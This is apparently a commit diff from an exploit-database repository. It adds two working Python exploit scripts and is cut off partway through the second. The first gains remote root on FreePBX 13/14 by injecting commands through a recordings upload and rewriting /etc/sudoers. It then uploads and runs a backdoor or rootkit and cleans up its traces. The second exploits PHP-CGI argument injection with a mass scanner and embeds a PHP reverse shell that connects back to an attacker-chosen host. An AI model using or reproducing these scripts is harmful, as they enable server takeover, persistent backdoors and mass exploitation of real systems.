Parameter SQL Injection gpEasy CMS 'section' Parameter Cross-Site Scripting gpEasy CMS - 'section' Parameter Cross-Site Scripting iCart Pro 'section' Parameter SQL Injection iCart Pro - 'section' Parameter SQL Injection WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting Squirrelcart 'table' Parameter Cross-Site Scripting Squirrelcart - 'table' Parameter Cross-Site Scripting OpenEMR 'site' Parameter Cross-Site Scripting OpenEMR - 'site' Parameter Cross-Site Scripting WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting Jaow CMS 'add_ons' Parameter Cross-Site Scripting Jaow CMS - 'add_ons' Parameter Cross-Site Scripting WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting Symphony 'sort' Parameter SQL Injection Symphony - 'sort' Parameter SQL Injection WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Request Tracker 'ShowPending' Parameter SQL Injection WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection Request Tracker - 'ShowPending' Parameter SQL Injection Fork CMS 'file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Open Flash Chart 'get-data' Parameter Cross-Site Scripting WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download Open Flash Chart - 'get-data' Parameter Cross-Site Scripting Jojo CMS 'search' Parameter Cross-Site Scripting Jojo CMS - 'search' Parameter Cross-Site Scripting WordPress Ambience Theme 'src' Parameter Cross-Site Scripting WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting TaxiMonger for Android 'name' Parameter HTML Injection TaxiMonger for Android - 'name' Parameter HTML Injection ZamFoo 'date' Parameter Remote Command Injection ZamFoo - 'date' Parameter Remote Command Injection Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting WordPress WP Feed Plugin 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting WordPress WP Feed Plugin - 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting Xibo 'layout' Parameter HTML Injection Xibo - 'layout' Parameter HTML Injection Flo CMS 'archivem' Parameter SQL Injection Flo CMS - 'archivem' Parameter SQL Injection eTransfer Lite 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection eTransfer Lite - 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection Monstra CMS 'login' Parameter SQL Injection Monstra CMS - 'login' Parameter SQL Injection Joomla! JVideoClip Component 'uid' Parameter SQL Injection Joomla! JVideoClip Component - 'uid' Parameter SQL Injection WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Joomla! Maian15 Component - 'name' Parameter Arbitrary Shell Upload Nagios XI 'tfPassword' Parameter SQL Injection Nagios XI - 'tfPassword' Parameter SQL Injection Enorth Webpublisher CMS 'thisday' Parameter SQL Injection Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection eduTrac 'showmask' Parameter Directory Traversal eduTrac - 'showmask' Parameter Directory Traversal Veno File Manager 'q' Parameter Arbitrary File Download Veno File Manager - 'q' Parameter Arbitrary File Download Leed 'id' Parameter SQL Injection Leed - 'id' Parameter SQL Injection xBoard 'post' Parameter Local File Inclusion xBoard - 'post' Parameter Local File Inclusion i-doit Pro 'objID' Parameter SQL Injection i-doit Pro - 'objID' Parameter SQL Injection Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection XOS Shop 'goto' Parameter SQL Injection XOS Shop - 'goto' Parameter SQL Injection Eventum 'hostname' Parameter Remote Code Execution Eventum - 'hostname' Parameter Remote Code Execution WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection Professional Designer E-Store 'id' Parameter Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injection MeiuPic 'ctl' Parameter Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion Jorjweb 'id' Parameter SQL Injection qEngine 'run' Parameter Local File Inclusion Jorjweb - 'id' Parameter SQL Injection qEngine - 'run' Parameter Local File Inclusion Seo Panel 'file' Parameter Directory Traversal Seo Panel - 'file' Parameter Directory Traversal ZeusCart 'prodid' Parameter SQL Injection ZeusCart - 'prodid' Parameter SQL Injection VoipSwitch 'action' Parameter Local File Inclusion VoipSwitch - 'action' Parameter Local File Inclusion Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Excel - Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) FreePBX 13 / 14 - Remote Code Execution Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2) Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit
This commit is contained in:
Offensive Security
parent
ad0d8229c3
commit
52c4bb1e58
7 changed files with 1308 additions and 318 deletions
470
platforms/linux/webapps/40232.py
Executable file
470
platforms/linux/webapps/40232.py
Executable file
|
|
@ -0,0 +1,470 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding, latin-1 -*- ######################################################
|
||||
# #
|
||||
# DESCRIPTION #
|
||||
# FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net #
|
||||
# #
|
||||
# AUTHOR #
|
||||
# pgt - nullsecurity.net #
|
||||
# #
|
||||
# DATE #
|
||||
# 8-12-2016 #
|
||||
# #
|
||||
# VERSION #
|
||||
# freepbx0day.py 0.1 #
|
||||
# #
|
||||
# AFFECTED VERSIONS #
|
||||
# FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26) #
|
||||
# #
|
||||
# STATUS #
|
||||
# Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908 #
|
||||
# #
|
||||
# TESTED AGAINST #
|
||||
# * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso #
|
||||
# * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso #
|
||||
# #
|
||||
# TODO #
|
||||
# * SSL support (priv8) #
|
||||
# * parameter for TCP port #
|
||||
# #
|
||||
# HINT #
|
||||
# Base64 Badchars: '+', '/', '=' #
|
||||
# #
|
||||
################################################################################
|
||||
|
||||
'''
|
||||
Successful exploitation should looks like:
|
||||
|
||||
[*] enum FreePBX version
|
||||
[+] target running FreePBX 13
|
||||
[*] checking if target is vulnerable
|
||||
[+] target seems to be vulnerable
|
||||
[*] getting kernel version
|
||||
[!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 ....
|
||||
[+] Linux x86_64 platform
|
||||
[*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine
|
||||
[*] triggering incrond to gaining root permissions via sudo
|
||||
[*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD!
|
||||
[*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine
|
||||
[*] checking if we gained root permissions
|
||||
[!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root)
|
||||
[+] adding view.php to admin/.htaccess
|
||||
[*] creating upload script: admin/libraries/view.php
|
||||
[*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php
|
||||
[*] removing view.php from admin/.htaccess
|
||||
[*] rm -f admin/libraries/view.php
|
||||
[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23
|
||||
[*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers
|
||||
[*] removing all temp files
|
||||
[!] have fun and HACK THE PLANET!
|
||||
'''
|
||||
|
||||
|
||||
import base64
|
||||
import httplib
|
||||
import optparse
|
||||
import re
|
||||
from socket import *
|
||||
import sys
|
||||
import time
|
||||
|
||||
|
||||
BANNER = '''\033[0;31m
|
||||
################################################################################
|
||||
#___________ ________________________ ___ ____________ #
|
||||
#\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ #
|
||||
# | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < #
|
||||
# | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ #
|
||||
# \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / #
|
||||
# \/ \/ \/ \/ \_/ \/ #
|
||||
# _______ .___ #
|
||||
# \ _ \ __| _/____ ___.__. * Remote Root 0-Day #
|
||||
# / /_\ \ ______ / __ |\__ \< | | #
|
||||
# \ \_/ \ /_____/ / /_/ | / __ \ \___ | #
|
||||
# \_____ / \____ |(____ / ____| #
|
||||
# \/ \/ \/\/ #
|
||||
# #
|
||||
# * Remote Command Execution Exploit (FreePBX 14 is affected also) #
|
||||
# * Local Root Exploit (probably FreePBX 14 is also exploitable) #
|
||||
# * Backdoor Upload + Execute As Root #
|
||||
# #
|
||||
# * Author: pgt - nullsecurity.net #
|
||||
# * Version: 0.1 #
|
||||
# #
|
||||
################################################################################
|
||||
\033[0;m'''
|
||||
|
||||
|
||||
def argspage():
|
||||
parser = optparse.OptionParser()
|
||||
|
||||
parser.add_option('-u', default=False, metavar='<url>',
|
||||
help='ip/url to exploit')
|
||||
parser.add_option('-r', default=False, metavar='<file>',
|
||||
help='Linux 32bit bd/rootkit')
|
||||
parser.add_option('-R', default=False, metavar='<file>',
|
||||
help='Linux 64bit bd/rootkit')
|
||||
parser.add_option('-a', default='/', metavar='<path>',
|
||||
help='FreePBX path - default: \'/\'')
|
||||
|
||||
args, args2 = parser.parse_args()
|
||||
|
||||
if (args.u == False) or (args.r == False) or (args.R == False):
|
||||
print ''
|
||||
parser.print_help()
|
||||
print '\n'
|
||||
exit(0)
|
||||
|
||||
return args
|
||||
|
||||
|
||||
def cleanup_fe():
|
||||
print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
|
||||
'\' from freepbx_engine'
|
||||
cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \
|
||||
'\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def cleanup_lr():
|
||||
print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \
|
||||
'\' from launch-restapps'
|
||||
cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \
|
||||
'modules/restapps/launch-restapps.sh'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def cleanup_htaccess():
|
||||
print '[*] removing view.php from admin/.htaccess'
|
||||
cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \
|
||||
'config\\\\.php|ajax\\\\.php/g\' .htaccess'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def cleanup_view_php():
|
||||
print '[*] rm -f admin/libraries/view.php'
|
||||
cmd = 'rm -f libraries/view.php'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def cleanup_sudoers():
|
||||
print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers'
|
||||
cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def cleanup_tmpfiles():
|
||||
print '[*] removing all temp files'
|
||||
cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null'
|
||||
command_execution(cmd)
|
||||
|
||||
return
|
||||
|
||||
|
||||
def check_platform(response):
|
||||
if (response.find('Linux') != -1) and (response.find('x86_64') != -1):
|
||||
print '[+] Linux x86_64 platform'
|
||||
return '64'
|
||||
elif (response.find('Linux') != -1) and (response.find('i686') != -1):
|
||||
print '[+] Linux i686 platform'
|
||||
cleanup_tmpfiles()
|
||||
sys.exit(1)
|
||||
return '32'
|
||||
else:
|
||||
print '[-] adjust check_platform() when you want to backdoor ' \
|
||||
'other platforms'
|
||||
cleanup_tmpfiles()
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def check_kernel(response):
|
||||
if response.find('w00t') != -1:
|
||||
start = response.find('w00t') + 4
|
||||
end = response.find('w00tw00t') - 1
|
||||
print '[!] Kernel: %s' % (response[start:end].replace('\\', ''))
|
||||
|
||||
return check_platform(response[start:end])
|
||||
|
||||
|
||||
def check_root(response):
|
||||
if response.find('uid=0(root)') != -1:
|
||||
start = response.find('w00t') + 4
|
||||
end = response.find('w00tw00t') - 2
|
||||
print '[!] w00tw00t w3 r r00t - %s' % (response[start:end])
|
||||
return
|
||||
else:
|
||||
print '[-] we are not root :('
|
||||
cleanup_fe()
|
||||
cleanup_lr()
|
||||
cleanup_tmpfiles()
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def build_request(filename):
|
||||
body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \
|
||||
'&command=convert&module=recordings' % (filename)
|
||||
content_type = 'application/x-www-form-urlencoded; charset=UTF-8'
|
||||
|
||||
return content_type, body
|
||||
|
||||
|
||||
def filter_filename(response):
|
||||
start = response.find('localfilename":"w00t') + 16
|
||||
end = response.find('.wav') + 4
|
||||
|
||||
return response[start:end]
|
||||
|
||||
|
||||
def post(path, content_type, body):
|
||||
h = httplib.HTTP(ARGS.u)
|
||||
h.putrequest('POST', '%s%s' % (ARGS.a, path))
|
||||
h.putheader('Host' , '%s' % (ARGS.u))
|
||||
h.putheader('Referer' , 'http://%s/' % (ARGS.u))
|
||||
h.putheader('Content-Type', content_type)
|
||||
h.putheader('Content-Length', str(len(body)))
|
||||
h.endheaders()
|
||||
h.send(body)
|
||||
errcode, errmsg, headers = h.getreply()
|
||||
|
||||
return h.file.read()
|
||||
|
||||
|
||||
def encode_multipart_formdata(fields, filename=None):
|
||||
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
||||
CRLF = '\r\n'
|
||||
L = []
|
||||
L.append('--' + LIMIT)
|
||||
if fields:
|
||||
for (key, value) in fields.items():
|
||||
L.append('Content-Disposition: form-data; name="%s"' % key)
|
||||
L.append('')
|
||||
L.append(value)
|
||||
L.append('--' + LIMIT)
|
||||
|
||||
if filename == None:
|
||||
L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
|
||||
L.append('Content-Type: audio/mpeg')
|
||||
L.append('')
|
||||
L.append('da')
|
||||
else:
|
||||
L.append('Content-Disposition: form-data; name="file"; filename="dasd"')
|
||||
L.append('Content-Type: application/octet-stream')
|
||||
L.append('')
|
||||
L.append(open_file(filename))
|
||||
|
||||
L.append('--' + LIMIT + '--')
|
||||
L.append('')
|
||||
body = CRLF.join(L)
|
||||
content_type = 'multipart/form-data; boundary=%s' % (LIMIT)
|
||||
|
||||
return content_type, body
|
||||
|
||||
|
||||
def create_fields(payload):
|
||||
fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru',
|
||||
'systemrecording': '', 'filename': 'w00t%s' % (payload)}
|
||||
|
||||
return fields
|
||||
|
||||
|
||||
def command_execution(cmd):
|
||||
upload_path = 'admin/ajax.php?module=recordings&command=' \
|
||||
'savebrowserrecording'
|
||||
cmd = base64.b64encode(cmd)
|
||||
payload = '`echo %s | base64 -d | sh`' % (cmd)
|
||||
fields = create_fields(payload)
|
||||
content_type, body = encode_multipart_formdata(fields)
|
||||
response = post(upload_path, content_type, body)
|
||||
filename = filter_filename(response)
|
||||
content_type, body = build_request(filename)
|
||||
|
||||
return post('admin/ajax.php', content_type, body)
|
||||
|
||||
|
||||
def check_vuln():
|
||||
h = httplib.HTTP(ARGS.u)
|
||||
h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a))
|
||||
h.putheader('Host' , '%s' % (ARGS.u))
|
||||
h.endheaders()
|
||||
errcode, errmsg, headers = h.getreply()
|
||||
response = h.file.read()
|
||||
|
||||
if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1:
|
||||
print '[-] target seems not to be vulnerable'
|
||||
sys.exit(1)
|
||||
|
||||
upload_path = 'admin/ajax.php?module=recordings&command' \
|
||||
'=savebrowserrecording'
|
||||
payload = 'w00tw00t'
|
||||
fields = create_fields(payload)
|
||||
content_type, body = encode_multipart_formdata(fields)
|
||||
response = post(upload_path, content_type, body)
|
||||
|
||||
if response.find('localfilename":"w00tw00tw00t') != -1:
|
||||
print '[+] target seems to be vulnerable'
|
||||
return
|
||||
else:
|
||||
print '[-] target seems not to be vulnerable'
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def open_file(filename):
|
||||
try:
|
||||
f = open(filename, 'rb')
|
||||
file_content = f.read()
|
||||
f.close()
|
||||
return file_content
|
||||
except IOError:
|
||||
print '[-] %s does not exists!' % (filename)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def version13():
|
||||
print '[*] checking if target is vulnerable'
|
||||
check_vuln()
|
||||
|
||||
print '[*] getting kernel version'
|
||||
cmd = 'uname -a; echo w00tw00t'
|
||||
response = command_execution(cmd)
|
||||
result = check_kernel(response)
|
||||
if result == '64':
|
||||
backdoor = ARGS.R
|
||||
elif result == '32':
|
||||
backdoor = ARGS.r
|
||||
|
||||
print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \
|
||||
'to freepbx_engine'
|
||||
cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \
|
||||
'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \
|
||||
'asterisk/bin/freepbx_engine'
|
||||
command_execution(cmd)
|
||||
|
||||
|
||||
print '[*] triggering incrond to gaining root permissions via sudo'
|
||||
cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart'
|
||||
command_execution(cmd)
|
||||
|
||||
print '[*] waiting 20 seconds while incrond restarts applications' \
|
||||
' - /_!_\\ VERY LOUD!'
|
||||
time.sleep(20)
|
||||
|
||||
cleanup_fe()
|
||||
#cleanup_lr()
|
||||
|
||||
print '[*] checking if we gained root permissions'
|
||||
cmd = 'sudo -n id; echo w00tw00t'
|
||||
response = command_execution(cmd)
|
||||
check_root(response)
|
||||
|
||||
print '[+] adding view.php to admin/.htaccess'
|
||||
cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \
|
||||
'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess'
|
||||
command_execution(cmd)
|
||||
|
||||
print '[*] creating upload script: admin/libraries/view.php'
|
||||
cmd = 'echo \'<?php move_uploaded_file($_FILES["file"]' \
|
||||
'["tmp_name"], "/tmp/23");?>\' > libraries/view.php'
|
||||
command_execution(cmd)
|
||||
|
||||
print '[*] uploading %s to /tmp/23 via ' \
|
||||
'admin/libraries/view.php' % (backdoor)
|
||||
content_type, body = encode_multipart_formdata(False, backdoor)
|
||||
post('admin/libraries/view.php', content_type, body)
|
||||
|
||||
cleanup_htaccess()
|
||||
cleanup_view_php()
|
||||
|
||||
print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \
|
||||
' rm -f /tmp/23'
|
||||
cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23'
|
||||
setdefaulttimeout(5)
|
||||
try:
|
||||
command_execution(cmd)
|
||||
except timeout:
|
||||
''' l4zY w0rk '''
|
||||
|
||||
setdefaulttimeout(20)
|
||||
try:
|
||||
cleanup_sudoers()
|
||||
cleanup_tmpfiles()
|
||||
except timeout:
|
||||
cleanup_tmpfiles()
|
||||
|
||||
return
|
||||
|
||||
|
||||
def enum_version():
|
||||
h = httplib.HTTP(ARGS.u)
|
||||
h.putrequest('GET', '%sadmin/config.php' % (ARGS.a))
|
||||
h.putheader('Host' , '%s' % (ARGS.u))
|
||||
h.endheaders()
|
||||
errcode, errmsg, headers = h.getreply()
|
||||
response = h.file.read()
|
||||
|
||||
if response.find('FreePBX 13') != -1:
|
||||
print '[+] target running FreePBX 13'
|
||||
return 13
|
||||
else:
|
||||
print '[-] target is not running FreePBX 13'
|
||||
|
||||
return False
|
||||
|
||||
|
||||
def checktarget():
|
||||
if re.match(r'^[0-9.\-]*$', ARGS.u):
|
||||
target = ARGS.u
|
||||
else:
|
||||
try:
|
||||
target = gethostbyname(ARGS.u)
|
||||
except gaierror:
|
||||
print '[-] \'%s\' is unreachable' % (ARGS.u)
|
||||
|
||||
sock = socket(AF_INET, SOCK_STREAM)
|
||||
sock.settimeout(5)
|
||||
result = sock.connect_ex((target, 80))
|
||||
sock.close()
|
||||
if result != 0:
|
||||
'[-] \'%s\' is unreachable' % (ARGS.u)
|
||||
sys.exit(1)
|
||||
|
||||
return
|
||||
|
||||
def main():
|
||||
print BANNER
|
||||
|
||||
checktarget()
|
||||
|
||||
open_file(ARGS.r)
|
||||
open_file(ARGS.R)
|
||||
|
||||
print '[*] enum FreePBX version'
|
||||
result = enum_version()
|
||||
|
||||
if result == 13:
|
||||
version13()
|
||||
|
||||
print '[!] have fun and HACK THE PLANET!'
|
||||
|
||||
return
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
ARGS = argspage()
|
||||
try:
|
||||
main()
|
||||
except KeyboardInterrupt:
|
||||
print '\nbye bye!!!'
|
||||
time.sleep(0.01)
|
||||
sys.exit(1)
|
||||
|
||||
#EOF
|
||||
398
platforms/php/remote/40233.py
Executable file
398
platforms/php/remote/40233.py
Executable file
|
|
@ -0,0 +1,398 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# ap-unlock-v1337.py - apache + php 5.* rem0te c0de execution exploit
|
||||
#
|
||||
# NOTE:
|
||||
# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((
|
||||
# - for connect back shell start netcat/nc and bind port on given host:port
|
||||
# - is ip-range scanner not is multithreaded, but iz multithreaded iz in
|
||||
# random scanner and is scanner from file (greets to MustLive)
|
||||
# - more php paths can be added
|
||||
# - adjust this shit for windows b0xes
|
||||
#
|
||||
# 2013
|
||||
# by noptrix - http://nullsecurity.net/
|
||||
|
||||
import sys, socket, argparse, threading, time, random, select, ssl
|
||||
|
||||
|
||||
NONE = 0
|
||||
VULN = 1
|
||||
SCMD = 2
|
||||
XPLT = 3
|
||||
|
||||
t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \
|
||||
'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \
|
||||
'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \
|
||||
'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\
|
||||
'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\
|
||||
'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'
|
||||
|
||||
|
||||
def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):
|
||||
c0nn_b4ck = \
|
||||
'''
|
||||
<? set_time_limit (0); $VERSION = "1.0"; $ip = "''' + cb_h0st + '''";
|
||||
$port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null;
|
||||
$error_a = null; $shell = "unset HISTFILE; uname -a; id; /bin/sh -i";
|
||||
$daemon = 0;
|
||||
$debug = 0; if (function_exists("pcntl_fork")) {$pid = pcntl_fork();
|
||||
if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {
|
||||
exit(1);}$daemon = 1;} else {print "bla";}chdir("/");umask(0);
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {
|
||||
printit("$errstr ($errno)");exit(1);}$descriptorspec = array(
|
||||
0 => array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
|
||||
printit("Successfully opened reverse shell to $ip:$port");while (1) {
|
||||
if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
|
||||
if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}
|
||||
if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");
|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);
|
||||
fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
|
||||
function printit ($string) {if (!$daemon) {print "$string\n";}}?>
|
||||
'''
|
||||
return c0nn_b4ck
|
||||
|
||||
|
||||
def enc0dez():
|
||||
n33dz1 = ('cgi-bin', 'php')
|
||||
n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',
|
||||
'suhosin.simulation=on', '-d', 'disable_functions=""', '-d',
|
||||
'open_basedir=none', '-d', 'auto_prepend_file=php://input',
|
||||
'-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',
|
||||
'-d', 'auto_prepend_file=php://input', '-n')
|
||||
fl4g = 0
|
||||
arg5 = ''
|
||||
p4th = ''
|
||||
plus = ''
|
||||
|
||||
for x in n33dz2:
|
||||
if fl4g == 1:
|
||||
plus = '+'
|
||||
arg5 = arg5 + plus + \
|
||||
''.join('%' + c.encode('utf-8').encode('hex') for c in x)
|
||||
fl4g = 1
|
||||
for x in n33dz1:
|
||||
p4th = p4th + '/' + \
|
||||
''.join('%' + c.encode('utf-8').encode('hex') for c in x)
|
||||
return (p4th, arg5)
|
||||
|
||||
|
||||
def m4k3_p4yl0rd(p4yl0rd, m0de):
|
||||
p4th, arg5 = enc0dez()
|
||||
if m0de == VULN:
|
||||
p4yl0rd = t3st
|
||||
elif m0de == SCMD or m0de == XPLT:
|
||||
p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \
|
||||
'Host: ' + sys.argv[1] + '\r\n' \
|
||||
'Content-Type: application/x-www-form-urlencoded\r\n' \
|
||||
'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd
|
||||
return p4yl0rd
|
||||
|
||||
|
||||
def s3nd_sh1t_ss1(args, m0de, c0nn_b4ck):
|
||||
pat = ('<b>Parse error</b>:', '<b>Warning</b>:')
|
||||
s = d0_c0nn3ct(args)
|
||||
try:
|
||||
ss = socket.ssl(s)
|
||||
except:
|
||||
print "-> n0 w3bs3rv3r 0n %s" % (args.h)
|
||||
return
|
||||
if m0de == VULN:
|
||||
p4yl0rd = m4k3_p4yl0rd('', m0de)
|
||||
ss.write(p4yl0rd)
|
||||
try:
|
||||
d4t4 = ss.read(8192)
|
||||
except:
|
||||
return
|
||||
for p in pat:
|
||||
if p in d4t4:
|
||||
print "-> " + args.h + " vu1n"
|
||||
return args.h
|
||||
else:
|
||||
if args.v:
|
||||
print "-> %s n0t vu1n" % (args.h)
|
||||
return
|
||||
elif m0de == SCMD:
|
||||
p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de)
|
||||
ss.write(p4yl0rd)
|
||||
rd, wd, ex = select.select([s], [], [], float(args.T))
|
